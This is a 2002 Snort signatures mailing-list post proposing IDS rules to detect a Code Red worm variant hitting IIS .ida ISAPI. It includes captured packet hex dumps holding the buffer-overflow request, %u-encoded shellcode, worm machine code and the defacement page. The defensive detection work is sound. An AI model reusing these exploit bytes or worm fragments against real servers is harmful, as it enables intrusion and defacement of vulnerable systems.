[Snort-sigs] Code Red Signature

Robert Wagner rwagner at ...447...
Thu Apr 11 09:00:13 EDT 2002


I believe this is a small variant of Code Red, not a new version.  I have
tried two new signatures, but only one is picking it up.  Currently, this is
picked up by the "WEB-IIS ISAPI .ida attempt".  I believe it may be
preferable to add this above the ISAPI .ida signature so a system
administrator can identify between an automated worm / virus activity and
manual, focused hacking attempt.

I was wondering if there is a way to check for content in two different
places of a packet without making on long content string?  Checking for
".ida?" and "worm.com" in the same packet would enable a very accurate
signature and less fluff.

------------------------> NEW - Doesn't pick it up
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS CodeRed
root.exe attack"; flags: A+; uricontent:"NNNNNNNNN%u9090%u6858%"; tag: host,
300, packets, src; nocase;classtype:web-application-attack; sid: 1256;
rev:2;)

------------------------> NEW - Does pick it up
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS CodeRed
default.ida attack"; flags: A+; uricontent:"|4E 4E 4E 4E 4E 4E 4E 4E 4E 4E
4E 4E 4E 4E 4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C3 03 00
00 00 78 00 FA 20 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 33 25
75 37 38 30|"; tag: host, 300, packets, src;
nocase;classtype:web-application-attack; sid: 1256; rev:2;)

------------------------> Does pick it up
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ISAPI .ida
attempt"; uricontent:".ida?"; nocase; dsize:>239; flags:A+;
reference:arachnids,552; classtype:web-application-attack;
reference:cve,CAN-2000-0071; sid:1243; rev:2;)


The packet looks like:
0x0030: 21 24 00 00 00 00 47 45 54 20 2F 64 65 66 61 75  !$....GET /defau
0x0040: 6C 74 2E 69 64 61 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E  lt.ida?NNNNNNNNN
0x0050: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0060: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0070: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0080: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0090: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00F0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0100: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0110: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0120: 4E 4E 4E 4E 4E 4E 4E 00 00 00 00 00 00 00 00 00  NNNNNNN.........
0x0130: 00 00 00 00 00 00 C3 03 00 00 00 78 00 FA 20 25  ...........x.. %
0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36  3%u7801%u9090%u6
0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39  u9090%u9090%u819
0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38  0%u00c3%u0003%u8
0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25  b00%u531b%u53ff%
0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D  u0078%u0000%u00=
0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  a  HTTP/1.0..Con
0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F  tent-type: text/
0x01D0: 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F 72  xml.HOST:www.wor
0x01E0: 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A  m.com. Accept: *
0x01F0: 2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74  /*.Content-lengt
0x0200: 68 3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81  h: 3569 ....U...
0x0210: EC 18 02 00 00 53 56 57 8D BD E8 FD FF FF B9 86  .....SVW........
0x0220: 00 00 00 B8 CC CC CC CC F3 AB C7 85 70 FE FF FF  ............p...
0x0230: 00 00 00 00 E9 0A 0B 00 00 8F 85 68 FE FF FF 8D  ...........h....
0x0240: BD F0 FE FF FF 64 A1 00 00 00 00 89 47 08 64 89  .....d......G.d.
0x0250: 3D 00 00 00 00 E9 6F 0A 00 00 8F 85 60 FE FF FF  =.....o.....`...
0x0260: C7 85 F0 FE FF FF FF FF FF FF 8B 85 68 FE FF FF  ............h...
0x0270: 83 E8 07 89 85 F4 FE FF FF C7 85 58 FE FF FF 00  ...........X....


The other choice is to pickup on a later packet that has (I thought this was
a little late in the process to be warning someone) PS - you are infected by
this point if vulnerable:

0x0230: C3 EB EC E8 F1 F4 FF FF 4C 6F 61 64 4C 69 62 72  ........LoadLibr
0x0240: 61 72 79 41 00 47 65 74 53 79 73 74 65 6D 54 69  aryA.GetSystemTi
0x0250: 6D 65 00 43 72 65 61 74 65 54 68 72 65 61 64 00  me.CreateThread.
0x0260: 43 72 65 61 74 65 46 69 6C 65 41 00 53 6C 65 65  CreateFileA.Slee
0x0270: 70 00 47 65 74 53 79 73 74 65 6D 44 65 66 61 75  p.GetSystemDefau
0x0280: 6C 74 4C 61 6E 67 49 44 00 56 69 72 74 75 61 6C  ltLangID.Virtual
0x0290: 50 72 6F 74 65 63 74 00 09 69 6E 66 6F 63 6F 6D  Protect..infocom
0x02A0: 6D 2E 64 6C 6C 00 54 63 70 53 6F 63 6B 53 65 6E  m.dll.TcpSockSen
0x02B0: 64 00 09 57 53 32 5F 33 32 2E 64 6C 6C 00 73 6F  d..WS2_32.dll.so
0x02C0: 63 6B 65 74 00 63 6F 6E 6E 65 63 74 00 73 65 6E  cket.connect.sen
0x02D0: 64 00 72 65 63 76 00 63 6C 6F 73 65 73 6F 63 6B  d.recv.closesock
0x02E0: 65 74 00 09 77 33 73 76 63 2E 64 6C 6C 00 00 47  et..w3svc.dll..G
0x02F0: 45 54 20 00 3F 00 20 20 48 54 54 50 2F 31 2E 30  ET .?.  HTTP/1.0
0x0300: 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20  ..Content-type:
0x0310: 74 65 78 74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77  text/xml.HOST:ww
0x0320: 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20 41 63 63 65  w.worm.com. Acce
0x0330: 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74 65 6E 74 2D  pt: */*.Content-
0x0340: 6C 65 6E 67 74 68 3A 20 33 35 36 39 20 0D 0A 0D  length: 3569 ...
0x0350: 0A 00 63 3A 5C 6E 6F 74 77 6F 72 6D 00 4C 4D 54  ..c:\notworm.LMT
0x0360: 48 0D 0A 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C  H..<html><head><
0x0370: 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D  meta http-equiv=
0x0380: 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 63  "Content-Type" c
0x0390: 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D  ontent="text/htm
0x03A0: 6C 3B 20 63 68 61 72 73 65 74 3D 65 6E 67 6C 69  l; charset=engli
0x03B0: 73 68 22 3E 3C 74 69 74 6C 65 3E 48 45 4C 4C 4F  sh"><title>HELLO
0x03C0: 21 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E  !</title></head>
0x03D0: 3C 62 61 64 79 3E 3C 68 72 20 73 69 7A 65 3D 35  <bady><hr size=5
0x03E0: 3E 3C 66 6F 6E 74 20 63 6F 6C 6F 72 3D 22 72 65  ><font color="re
0x03F0: 64 22 3E 3C 70 20 61 6C 69 67 6E 3D 22 63 65 6E  d"><p align="cen
0x0400: 74 65 72 22 3E 57 65 6C 63 6F 6D 65 20 74 6F 20  ter">Welcome to
0x0410: 68 74 74 70 3A 2F 2F 77 77 77 2E 77 6F 72 6D 2E  http://www.worm.
0x0420: 63 6F 6D 20 21 3C 62 72 3E 3C 62 72 3E 48 61 63  com !<br><br>Hac
0x0430: 6B 65 64 20 42 79 20 43 68 69 6E 65 73 65 21 3C  ked By Chinese!<
0x0440: 2F 66 6F 6E 74 3E 3C 2F 68 72 3E 3C 2F 62 61 64  /font></hr></bad
0x0450: 79 3E 3C 2F 68 74 6D 6C 3E 20 20 20 20 20 20 20  y></html>
0x0460: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20




More information about the Snort-sigs mailing list